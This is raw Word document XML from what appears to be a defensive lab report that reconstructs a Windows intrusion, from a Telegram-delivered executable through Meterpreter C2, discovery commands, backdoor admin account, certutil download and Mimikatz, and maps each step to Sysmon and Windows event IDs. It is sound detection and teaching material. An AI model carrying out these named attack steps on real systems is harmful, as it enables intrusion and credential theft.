                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="359668E1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>User execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="319A72EF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="189E77BB">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Victim opens the executable and approves elevation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4EE1D241">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Process creation; parent Explorer; elevated IntegrityLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A75A9BF">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Sysmon 1 ProcessGuid + parent/child lineage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="76A4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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="48BC5FDB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B68751B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D22AC72">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="220287F3">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Meterpreter reverse HTTP callback starts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7AF31C04">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Network connection from payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2235390F">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Sysmon 3 correlated to same ProcessGuid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6CA1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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="074A53BC">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2051799A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E8B0573">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7D8A0178">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whoami, hostname, systeminfo, and related commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="709E5617">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Child processes from command shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="10A649F4">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Sysmon 1 sequence / process tree</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="715A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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4A19D935">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E05B1EF">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5. Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2CE7687F">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Local account created; added to Administrators; scheduled task created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="02BCE4B2">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Process commands + Windows account/task events</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1D267350">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Sysmon 1 + 4720 + 4732 + 4698</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="74CBF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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D2ADD46">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08AD59C8">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Tool transfer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AF6C5B9">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="15B9BC53">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certutil is used to download additional tool content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="01E5CE08">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DNS, network connection, process creation, file creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5406F965">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Sysmon 1 + 3 + 11/15 + 22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2E554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shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4D0A8F82">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="235095BD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Credential access</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7ED69A47">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="273C6191">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Mimikatz executed; privilege::debug invoked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0A25DCA7">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Process creation; possible LSASS access if a credential dump follows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="727D1A61">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Sysmon 1; Sysmon 10 if LSASS access occurs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6647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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1DF7BAAE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7669F049">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="8"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Cleanup / closure</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5794840A">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="35EEEBAD">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Some lab artifacts may be removed after demonstration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19718B22">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Account deletion and terminated processes may appear</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6BD0E6F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows events + process termination / timeline closure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56FF2CD9">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A chronological reconstruction of the scenario from the attacker’s perspective, followed by the defender’s evidence pivots.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99E115">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="1F6FEB"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>05 / INITIAL ACCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA63123">
      <w:pPr>
        <w:pStyle w:val="40"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>Phase 1 — Phishing and User Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088CFD9A">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="475569"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Model the initial-access story accurately: the delivery technique depends on the channel used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0005690D">
      <w:pPr>
        <w:pStyle w:val="36"/>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supplied run begins with a file download through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="37"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Telegram Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and continues with execution of the downloaded executable. Sysmon Event 15 records the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Zone.Identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ZoneId=3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the Telegram Web URL, while Sysmon Event 1 shows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FreeClude.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> executing from the Downloads directory with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>explorer.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as its parent.</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2537"/>
        <w:gridCol w:w="2537"/>
        <w:gridCol w:w="2537"/>
      </w:tblGrid>
      <w:tr w14:paraId="1F80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shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="0B104015">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3440CBD5">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scenario variant</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64B832F4">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="04A2D0A7">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17C6F5B8">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="1A7C4279">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="607C04F5">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>What to prove</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2537" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD" w:themeFill="accent1"/>
          </w:tcPr>
          <w:p w14:paraId="075C5899">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43429385">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
